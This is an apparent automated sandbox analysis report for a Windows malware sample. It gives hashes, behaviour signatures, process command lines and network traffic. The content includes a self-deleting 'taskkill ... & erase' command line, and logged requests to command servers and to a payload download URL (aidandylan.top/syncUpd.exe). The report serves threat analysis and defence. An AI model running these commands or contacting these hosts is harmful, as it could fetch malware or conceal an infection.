Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
-
submitted
06/10/2023, 13:31 UTC
General
-
Target
NEAS.3c384c9d8c7d64f86d8506f713191cd90b83ec734a19137ce86f13067bbc426cexe_JC.exe
-
Size
252KB
-
MD5
9452dff09397314ab6dc4c685e6c8f02
-
SHA1
3374e1886a0992cc147ae1d0005ee387b3840354
-
SHA256
3c384c9d8c7d64f86d8506f713191cd90b83ec734a19137ce86f13067bbc426c
-
SHA512
f9cde18bba746fa189ba9a4f995707f802d934550606905dc54420cbaff66268db61b63c57a0891d63040d95eee663b424ae472721474ec15e541b66c7f97c19
-
SSDEEP
3072:bwd998ZfNKx2bdV4VUVAMmoymL0qMA6wcyN7cQZzi0oeH5NrM0:C98KwbXV3moymJMGNtcQZz5vr
Score
7/10
Malware Config
Signatures
-
Deletes itself 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\NEAS.3c384c9d8c7d64f86d8506f713191cd90b83ec734a19137ce86f13067bbc426cexe_JC.exe"C:\Users\Admin\AppData\Local\Temp\NEAS.3c384c9d8c7d64f86d8506f713191cd90b83ec734a19137ce86f13067bbc426cexe_JC.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\3924418844.exe"2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "NEAS.3c384c9d8c7d64f86d8506f713191cd90b83ec734a19137ce86f13067bbc426cexe_JC.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\NEAS.3c384c9d8c7d64f86d8506f713191cd90b83ec734a19137ce86f13067bbc426cexe_JC.exe" & exit2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "NEAS.3c384c9d8c7d64f86d8506f713191cd90b83ec734a19137ce86f13067bbc426cexe_JC.exe" /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
Network
-
GEThttp://5.42.64.10/ip.phpRemote address:5.42.64.10:80RequestGET /ip.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: hQXf-nS2*X-1-oUyFQfh
Host: 5.42.64.10
ResponseHTTP/1.1 200 OK
Date: Fri, 06 Oct 2023 13:31:27 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 12
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
GEThttp://5.42.64.10/api/files/client/s21Remote address:5.42.64.10:80RequestGET /api/files/client/s21 HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: hQXf-nS2*X-1-oUyFQfh
Host: 5.42.64.10
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 06 Oct 2023 13:31:27 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
GEThttp://5.42.64.10/api/files/client/s22Remote address:5.42.64.10:80RequestGET /api/files/client/s22 HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: hQXf-nS2*X-1-oUyFQfh
Host: 5.42.64.10
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 06 Oct 2023 13:31:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
GEThttp://5.42.64.10/api/files/client/s23Remote address:5.42.64.10:80RequestGET /api/files/client/s23 HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: hQXf-nS2*X-1-oUyFQfh
Host: 5.42.64.10
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 06 Oct 2023 13:31:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
GEThttp://5.42.64.10/api/files/client/s24Remote address:5.42.64.10:80RequestGET /api/files/client/s24 HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: hQXf-nS2*X-1-oUyFQfh
Host: 5.42.64.10
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 06 Oct 2023 13:31:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
DNSaidandylan.topRemote address:8.8.8.8:53Requestaidandylan.topIN AResponseaidandylan.topIN A85.143.221.30 -
GEThttp://aidandylan.top/syncUpd.exeRemote address:85.143.221.30:80RequestGET /syncUpd.exe HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1955-27208-4878-9396
Host: aidandylan.top
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html
-
GEThttp://aidandylan.top/syncUpd.exeRemote address:85.143.221.30:80RequestGET /syncUpd.exe HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1955-27208-4878-9396
Host: aidandylan.top
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html
-
DNSscript.google.comRemote address:8.8.8.8:53Requestscript.google.comIN AResponsescript.google.comIN A172.217.23.206
-
GEThttp://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=2&ip=154.61.71.13&slots=1000¶m=emptyRemote address:172.217.23.206:80RequestGET /macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=2&ip=154.61.71.13&slots=1000¶m=empty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Host: script.google.com
ResponseHTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 06 Oct 2023 13:31:29 GMT
Location: https://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=2&ip=154.61.71.13&slots=1000¶m=empty
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Server: GSE
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
-
GEThttps://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=2&ip=154.61.71.13&slots=1000¶m=emptyRemote address:172.217.23.206:443RequestGET /macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=2&ip=154.61.71.13&slots=1000¶m=empty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Host: script.google.com
ResponseHTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Access-Control-Allow-Origin: *
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 06 Oct 2023 13:31:30 GMT
Location: https://script.googleusercontent.com/macros/echo?user_content_key=9aijQm9pJqb2o4y6fUffxVUgmwORTfUYnxL3UHuIvowmDgFbpbHiHLU835ELfV1wVYUp0rNynR6ESEGzrHHeBnLmy3QUkOuyOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa_kSw3KJAyZKK3RTU5bpIFQ10ckTyHVSt1vTS5MZ6zqvS4V0cmy1dEEXVXg5zXDjcYCeAylu8DyVhn7i0fteRV_StcynBwb4deQK9NYe9nyjGugVZE-wIMyyzTiW-FlOAvrTRB6COAW2Ixt0tBHk1mhW-khuoEndWp9QnSdXlA5fd37sNdGbdNo&lib=MAg_X_j8YJSR0PZgL-LNb21v93CYKtC0D
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
-
DNSscript.googleusercontent.comRemote address:8.8.8.8:53Requestscript.googleusercontent.comIN AResponsescript.googleusercontent.comIN CNAMEgooglehosted.l.googleusercontent.comgooglehosted.l.googleusercontent.comIN A142.251.36.1
-
GEThttps://script.googleusercontent.com/macros/echo?user_content_key=9aijQm9pJqb2o4y6fUffxVUgmwORTfUYnxL3UHuIvowmDgFbpbHiHLU835ELfV1wVYUp0rNynR6ESEGzrHHeBnLmy3QUkOuyOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa_kSw3KJAyZKK3RTU5bpIFQ10ckTyHVSt1vTS5MZ6zqvS4V0cmy1dEEXVXg5zXDjcYCeAylu8DyVhn7i0fteRV_StcynBwb4deQK9NYe9nyjGugVZE-wIMyyzTiW-FlOAvrTRB6COAW2Ixt0tBHk1mhW-khuoEndWp9QnSdXlA5fd37sNdGbdNo&lib=MAg_X_j8YJSR0PZgL-LNb21v93CYKtC0DRemote address:142.251.36.1:443RequestGET /macros/echo?user_content_key=9aijQm9pJqb2o4y6fUffxVUgmwORTfUYnxL3UHuIvowmDgFbpbHiHLU835ELfV1wVYUp0rNynR6ESEGzrHHeBnLmy3QUkOuyOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa_kSw3KJAyZKK3RTU5bpIFQ10ckTyHVSt1vTS5MZ6zqvS4V0cmy1dEEXVXg5zXDjcYCeAylu8DyVhn7i0fteRV_StcynBwb4deQK9NYe9nyjGugVZE-wIMyyzTiW-FlOAvrTRB6COAW2Ixt0tBHk1mhW-khuoEndWp9QnSdXlA5fd37sNdGbdNo&lib=MAg_X_j8YJSR0PZgL-LNb21v93CYKtC0D HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Host: script.googleusercontent.com
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Access-Control-Allow-Origin: *
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 06 Oct 2023 13:31:31 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
Transfer-Encoding: chunked
-
5.42.64.10:80http://5.42.64.10/ip.phphttp
HTTP Request
GET http://5.42.64.10/ip.phpHTTP Response
200 -
5.42.64.10:80http://5.42.64.10/api/files/client/s24http
HTTP Request
GET http://5.42.64.10/api/files/client/s21HTTP Response
200HTTP Request
GET http://5.42.64.10/api/files/client/s22HTTP Response
200HTTP Request
GET http://5.42.64.10/api/files/client/s23HTTP Response
200HTTP Request
GET http://5.42.64.10/api/files/client/s24HTTP Response
200 -
85.143.221.30:80http://aidandylan.top/syncUpd.exehttp
HTTP Request
GET http://aidandylan.top/syncUpd.exeHTTP Response
503 -
85.143.221.30:80http://aidandylan.top/syncUpd.exehttp
HTTP Request
GET http://aidandylan.top/syncUpd.exeHTTP Response
503 -
172.217.23.206:80http://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=2&ip=154.61.71.13&slots=1000¶m=emptyhttp
HTTP Request
GET http://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=2&ip=154.61.71.13&slots=1000¶m=emptyHTTP Response
301 -
172.217.23.206:443https://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=2&ip=154.61.71.13&slots=1000¶m=emptytls, http
HTTP Request
GET https://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=2&ip=154.61.71.13&slots=1000¶m=emptyHTTP Response
302 -
142.251.36.1:443https://script.googleusercontent.com/macros/echo?user_content_key=9aijQm9pJqb2o4y6fUffxVUgmwORTfUYnxL3UHuIvowmDgFbpbHiHLU835ELfV1wVYUp0rNynR6ESEGzrHHeBnLmy3QUkOuyOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa_kSw3KJAyZKK3RTU5bpIFQ10ckTyHVSt1vTS5MZ6zqvS4V0cmy1dEEXVXg5zXDjcYCeAylu8DyVhn7i0fteRV_StcynBwb4deQK9NYe9nyjGugVZE-wIMyyzTiW-FlOAvrTRB6COAW2Ixt0tBHk1mhW-khuoEndWp9QnSdXlA5fd37sNdGbdNo&lib=MAg_X_j8YJSR0PZgL-LNb21v93CYKtC0Dtls, http
HTTP Request
GET https://script.googleusercontent.com/macros/echo?user_content_key=9aijQm9pJqb2o4y6fUffxVUgmwORTfUYnxL3UHuIvowmDgFbpbHiHLU835ELfV1wVYUp0rNynR6ESEGzrHHeBnLmy3QUkOuyOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa_kSw3KJAyZKK3RTU5bpIFQ10ckTyHVSt1vTS5MZ6zqvS4V0cmy1dEEXVXg5zXDjcYCeAylu8DyVhn7i0fteRV_StcynBwb4deQK9NYe9nyjGugVZE-wIMyyzTiW-FlOAvrTRB6COAW2Ixt0tBHk1mhW-khuoEndWp9QnSdXlA5fd37sNdGbdNo&lib=MAg_X_j8YJSR0PZgL-LNb21v93CYKtC0DHTTP Response
200
-
8.8.8.8:53aidandylan.topdns
DNS Request
aidandylan.top
DNS Response
85.143.221.30
-
8.8.8.8:53script.google.comdns
DNS Request
script.google.com
DNS Response
172.217.23.206
-
8.8.8.8:53script.googleusercontent.comdns
DNS Request
script.googleusercontent.com
DNS Response
142.251.36.1
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1024KB
-
Filesize
1.7MB
-
Filesize
248KB
-
Filesize
1.7MB